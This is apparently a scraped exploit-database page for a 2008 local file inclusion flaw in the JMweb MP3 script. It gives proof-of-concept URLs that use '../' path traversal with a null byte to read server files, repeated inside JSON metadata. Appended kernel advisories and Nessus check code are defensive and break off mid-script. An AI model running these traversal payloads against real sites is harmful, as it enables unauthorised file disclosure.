Search...

JMweb Multiple (src) Local File Inclusion Vulnerabilities

2008-10-04T00:00:00

ID 1337DAY-ID-3832
Type zdt
Reporter SirGod
Modified 2008-10-04T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
JMweb Multiple (src) Local File Inclusion Vulnerabilities
=========================================================


#################################################################################################
[+] JMweb MP3 (src) Multiple Local File Inclusion
[+] Discovered By SirGod
##################################################################################################

# Script Homepage:
# http://www.jesse-web.co.cc //

[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip

[+] Local File Inclusion

     Example  1 :

       http://[target]/[path]/listen.php?src=[Local File]%00

     PoC 1 :

       http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00


    Example 2 :

       http://[target]/[path]/download.php?src=[Local File]%00

    PoC 2 :

      http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00

##################################################################################################



#  0day.today [2018-03-02]  #

JSON Vulners Source

Initial Source

{"hash": "1d1b4e4c7d3e081987c80a3315d2376e0f2650fa782bf683b3f946307d83b7bf", "id": "1337DAY-ID-3832", "lastseen": "2018-03-03T01:53:51", "viewCount": 3, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "cb5fd4767ae8372a90dacc93ac9ada7a", "key": "href"}, {"hash": "65b07241dad055b86ced4b1c965e307f", "key": "modified"}, {"hash": "65b07241dad055b86ced4b1c965e307f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "227758610fdec5dcc4d1a3dedb223f91", "key": "reporter"}, {"hash": "4af44738791302127297df080d7dd45d", "key": "sourceData"}, {"hash": "f78ed603cc316417297e7273e8e66cce", "key": "sourceHref"}, {"hash": "4373a28f6de1ba147916d951bd3e64c4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "nessus", "idList": ["SUSE_JAVA-1_4_2-IBM-4542.NASL", "SUSE_JAVA-1_5_0-IBM-4544.NASL"]}, {"type": "suse", "idList": ["SUSE-SA:2007:056"]}], "modified": "2018-03-03T01:53:51"}, "vulnersScore": 9.3}, "type": "zdt", "sourceHref": "https://0day.today/exploit/3832", "description": "Exploit for unknown platform in category web applications", "title": "\tJMweb Multiple (src) Local File Inclusion Vulnerabilities", "history": [{"bulletin": {"hash": "bc045296252733207d24e824b65e33308564e5282940b37df724c2aca51fce20", "id": "1337DAY-ID-3832", "lastseen": "2016-04-20T00:43:40", "enchantments": {"score": {"value": 5.1, "modified": "2016-04-20T00:43:40"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "4373a28f6de1ba147916d951bd3e64c4", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "227758610fdec5dcc4d1a3dedb223f91", "key": "reporter"}, {"hash": "e1b074352bba1faa7414f0b1f57277c0", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "3be0a1b7127b747554c7c6f1cfa15063", "key": "sourceHref"}, {"hash": "65b07241dad055b86ced4b1c965e307f", "key": "published"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "65b07241dad055b86ced4b1c965e307f", "key": "modified"}, {"hash": "fef1ada25aa26726d30a4dfa892828a8", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/3832", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "\tJMweb Multiple (src) Local File Inclusion Vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=========================================================\r\nJMweb Multiple (src) Local File Inclusion Vulnerabilities\r\n=========================================================\r\n\r\n\r\n#################################################################################################\r\n[+] JMweb MP3 (src) Multiple Local File Inclusion\r\n[+] Discovered By SirGod\r\n##################################################################################################\r\n\r\n# Script Homepage:\r\n# http://www.jesse-web.co.cc //\r\n\r\n[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip\r\n\r\n[+] Local File Inclusion\r\n\r\n Example 1 :\r\n\r\n http://[target]/[path]/listen.php?src=[Local File]%00\r\n\r\n PoC 1 :\r\n\r\n http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00\r\n\r\n\r\n Example 2 :\r\n\r\n http://[target]/[path]/download.php?src=[Local File]%00\r\n\r\n PoC 2 :\r\n\r\n http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00\r\n\r\n##################################################################################################\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2008-10-04T00:00:00", "references": [], "reporter": "SirGod", "modified": "2008-10-04T00:00:00", "href": "http://0day.today/exploit/description/3832"}, "lastseen": "2016-04-20T00:43:40", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=========================================================\r\nJMweb Multiple (src) Local File Inclusion Vulnerabilities\r\n=========================================================\r\n\r\n\r\n#################################################################################################\r\n[+] JMweb MP3 (src) Multiple Local File Inclusion\r\n[+] Discovered By SirGod\r\n##################################################################################################\r\n\r\n# Script Homepage:\r\n# http://www.jesse-web.co.cc //\r\n\r\n[+] Download : http://rapidshare.com/files/138968587/jmweb_audiosearch.zip\r\n\r\n[+] Local File Inclusion\r\n\r\n Example 1 :\r\n\r\n http://[target]/[path]/listen.php?src=[Local File]%00\r\n\r\n PoC 1 :\r\n\r\n http://127.0.0.1/path/listen.php?src=../../../../autoexec.bat%00\r\n\r\n\r\n Example 2 :\r\n\r\n http://[target]/[path]/download.php?src=[Local File]%00\r\n\r\n PoC 2 :\r\n\r\n http://127.0.0.1/path/download.php?src=../../../../autoexec.bat%00\r\n\r\n##################################################################################################\r\n\r\n\r\n\n# 0day.today [2018-03-02] #", "published": "2008-10-04T00:00:00", "references": [], "reporter": "SirGod", "modified": "2008-10-04T00:00:00", "href": "https://0day.today/exploit/description/3832"}

{"redhat": [{"lastseen": "2019-04-23T14:20:22", "bulletinFamily": "unix", "description": "The kernel-alt packages provide the Linux kernel version 4.x.\n\nSecurity Fix(es):\n\n* kernel: lack of check for mmap minimum address in expand_downwards in mm/mmap.c leads to NULL pointer dereferences exploit on non-SMAP platforms (CVE-2019-9213)\n\n* kernel: use-after-free in ucma_leave_multicast in drivers/infiniband/core/ucma.c (CVE-2018-14734)\n\n* kernel: Unprivileged users able to inspect kernel stacks of arbitrary tasks (CVE-2018-17972)\n\n* kernel: TLB flush happens too late on mremap (CVE-2018-18281)\n\n* kernel: Type confusion in drivers/tty/n_tty.c allows for a denial of service (CVE-2018-18386)\n\n* kernel: userfaultfd bypasses tmpfs file permissions (CVE-2018-18397)\n\n* kernel: Integer overflow in the alarm_timer_nsleep function (CVE-2018-13053)\n\n* kernel: NULL pointer dereference in xfs_da_shrink_inode function (CVE-2018-13094)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Failed to boot with ftrace=function in kvm with 2vcpu (BZ#1501024)\n\n* [ALT-7.5][x86_64] perf test 63 - inet_pton fails on x86_64 (BZ#1518836)\n\n* BUG: potential out-of-bounds string access when forcing a SELinux label on a file (BZ#1595706)\n\n* stack out-of-bounds in smb{2,3}_create_lease_buf() on SMB2/SMB3 mounts (BZ#1598757)\n\n* [ALT-7.6][KVM][PANIC] ltp/lite proc01 - Unable to handle kernel paging request at virtual address ffff7fe000200018 (BZ#1623193)\n\n* Kernel lock up due to read/write lock (BZ#1636261)\n\n* [RHEL-ALT] Fix potential Spectre v1 in tty code (BZ#1639679)\n\n* [Huawei AArch64 7.6 Bug] HNS3: Vlan on HNS3 NIC cannot communicate (BZ#1639713)\n\n* [RHEL7.6-ALT][AWS] backport \"nvme: update timeout module parameter type\" (BZ#1654958)\n\n* ignore STABLE_FLAG of rmap_item->address in rmap_walk_ksm (BZ#1663565)\n\n* RHEL-Alt-7.6 - kernel: zcrypt: fix specification exception on z196 at ap probe (BZ#1670018)\n\n* [Huawei AArch64 7.6 Bug] Flock over NFSv3 failed (BZ#1670650)\n\n* [Huawei AArch64 7.6/7.6-z Bug] HNS3: if a single transmit packet(skb) has more than 8 frags, will cause the NIC to be unavailable (BZ#1677643)\n\n* krb5{,i,p} doesn't work with older enctypes on aarch64 (BZ#1678922)\n\nUsers of kernel are advised to upgrade to these updated packages, which fix these bugs.", "modified": "2019-04-23T17:37:09", "published": "2019-04-23T16:37:36", "id": "RHSA-2019:0831", "href": "https://access.redhat.com/errata/RHSA-2019:0831", "type": "redhat", "title": "(RHSA-2019:0831) Important: kernel-alt security and bug fix update", "cvss": {"score": 6.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-05-23T20:32:03", "bulletinFamily": "software", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "modified": "2019-04-09T02:20:00", "published": "2019-04-09T02:20:00", "id": "F5:K39103040", "href": "https://support.f5.com/csp/article/K39103040", "title": "Kernel vulnerability CVE-2018-18955", "type": "f5", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cloudfoundry": [{"lastseen": "2018-12-20T11:48:42", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 16.04\n\n# Description\n\nUSN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559)\n\nCVEs contained in this USN include: CVE-2018-18955, CVE-2018-6559\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * Cloud Foundry BOSH xenial-stemcells are vulnerable, including: \n * 170.x versions prior to 170.12\n * 97.x versions prior to 97.39\n * All other stemcells not listed.\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends upgrading the following BOSH xenial-stemcells: \n * Upgrade 170.x versions to 170.12\n * Upgrade 97.x versions to 97.39\n * All other stemcells should be upgraded to the latest version available on [bosh.io](<https://bosh.io/stemcells/#ubuntu-xenial>).\n\n# References\n\n * [USN-3836-2](<https://usn.ubuntu.com/3836-2>)\n * [CVE-2018-18955](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-18955>)\n * [CVE-2018-6559](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-6559>)\n", "modified": "2018-12-06T00:00:00", "published": "2018-12-06T00:00:00", "id": "CFOUNDRY:06094473CAEAE018F16A4156F4D14103", "href": "https://www.cloudfoundry.org/blog/usn-3836-2/", "title": "USN-3836-2: Linux kernel (HWE) vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-02-21T01:44:21", "bulletinFamily": "scanner", "description": "Jann Horn discovered that the procfs file system implementation in the Linux kernel did not properly restrict the ability to inspect the kernel stack of an arbitrary task. A local attacker could use this to expose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel did not properly flush the TLB when completing, potentially leaving access to a physical page after it has been released to the page allocator. A local attacker could use this to cause a denial of service (system crash), expose sensitive information, or possibly execute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not correctly compute numeric bounds in some situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the Linux kernel did not properly enforce signed module loading when booted with UEFI Secure Boot in some situations. A local privileged attacker could use this to execute untrusted code in the kernel.\n(CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-07T00:00:00", "id": "UBUNTU_USN-3835-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119338", "published": "2018-12-04T00:00:00", "title": "Ubuntu 18.10 : linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities (USN-3835-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3835-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119338);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/12/07 9:46:53\");\n\n script_cve_id(\"CVE-2018-17972\", \"CVE-2018-18281\", \"CVE-2018-18445\", \"CVE-2018-18653\", \"CVE-2018-18955\", \"CVE-2018-6559\");\n script_xref(name:\"USN\", value:\"3835-1\");\n\n script_name(english:\"Ubuntu 18.10 : linux, linux-gcp, linux-kvm, linux-raspi2 vulnerabilities (USN-3835-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jann Horn discovered that the procfs file system implementation in the\nLinux kernel did not properly restrict the ability to inspect the\nkernel stack of an arbitrary task. A local attacker could use this to\nexpose sensitive information. (CVE-2018-17972)\n\nJann Horn discovered that the mremap() system call in the Linux kernel\ndid not properly flush the TLB when completing, potentially leaving\naccess to a physical page after it has been released to the page\nallocator. A local attacker could use this to cause a denial of\nservice (system crash), expose sensitive information, or possibly\nexecute arbitrary code. (CVE-2018-18281)\n\nIt was discovered that the BPF verifier in the Linux kernel did not\ncorrectly compute numeric bounds in some situations. A local attacker\ncould use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2018-18445)\n\nDaniel Dadap discovered that the module loading implementation in the\nLinux kernel did not properly enforce signed module loading when\nbooted with UEFI Secure Boot in some situations. A local privileged\nattacker could use this to execute untrusted code in the kernel.\n(CVE-2018-18653)\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or\nGID ranges inside nested user namespaces in some situations. A local\nattacker could use this to bypass access controls on resources outside\nthe namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the\nLinux kernel did not properly verify the directory contents\npermissions from within a unprivileged user namespace. A local\nattacker could use this to expose sensitive information (protected\nfile names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3835-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Nested User Namespace idmap Limit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.18-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(18\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 18.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1004-gcp\", pkgver:\"4.18.0-1004.5\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1005-kvm\", pkgver:\"4.18.0-1005.5\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-1007-raspi2\", pkgver:\"4.18.0-1007.9\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-12-generic\", pkgver:\"4.18.0-12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-12-generic-lpae\", pkgver:\"4.18.0-12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-12-lowlatency\", pkgver:\"4.18.0-12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-4.18.0-12-snapdragon\", pkgver:\"4.18.0-12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gcp\", pkgver:\"4.18.0.1004.4\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic\", pkgver:\"4.18.0.12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.18.0.12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-gke\", pkgver:\"4.18.0.1004.4\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-kvm\", pkgver:\"4.18.0.1005.5\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.18.0.12.13\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-raspi2\", pkgver:\"4.18.0.1007.4\")) flag++;\nif (ubuntu_check(osver:\"18.10\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.18.0.12.13\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.18-gcp / linux-image-4.18-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:44:21", "bulletinFamily": "scanner", "description": "USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04 LTS. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu 16.04 LTS.\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or GID ranges inside nested user namespaces in some situations. A local attacker could use this to bypass access controls on resources outside the namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the Linux kernel did not properly verify the directory contents permissions from within a unprivileged user namespace. A local attacker could use this to expose sensitive information (protected file names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "modified": "2018-12-20T00:00:00", "id": "UBUNTU_USN-3836-2.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=119340", "published": "2018-12-04T00:00:00", "title": "Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3836-2)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3836-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119340);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/12/20 11:08:46\");\n\n script_cve_id(\"CVE-2018-18955\", \"CVE-2018-6559\");\n script_xref(name:\"USN\", value:\"3836-2\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux-hwe, linux-gcp vulnerabilities (USN-3836-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"USN-3836-1 fixed vulnerabilities in the Linux kernel for Ubuntu 18.04\nLTS. This update provides the corresponding updates for the Linux\nHardware Enablement (HWE) kernel from Ubuntu 18.04 LTS for Ubuntu\n16.04 LTS.\n\nJann Horn discovered that the Linux kernel mishandles mapping UID or\nGID ranges inside nested user namespaces in some situations. A local\nattacker could use this to bypass access controls on resources outside\nthe namespace. (CVE-2018-18955)\n\nPhilipp Wendler discovered that the overlayfs implementation in the\nLinux kernel did not properly verify the directory contents\npermissions from within a unprivileged user namespace. A local\nattacker could use this to expose sensitive information (protected\nfile names). (CVE-2018-6559).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3836-2/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Nested User Namespace idmap Limit Local Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.15-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-hwe-16.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-oem\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018 Canonical, Inc. / NASL script (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif 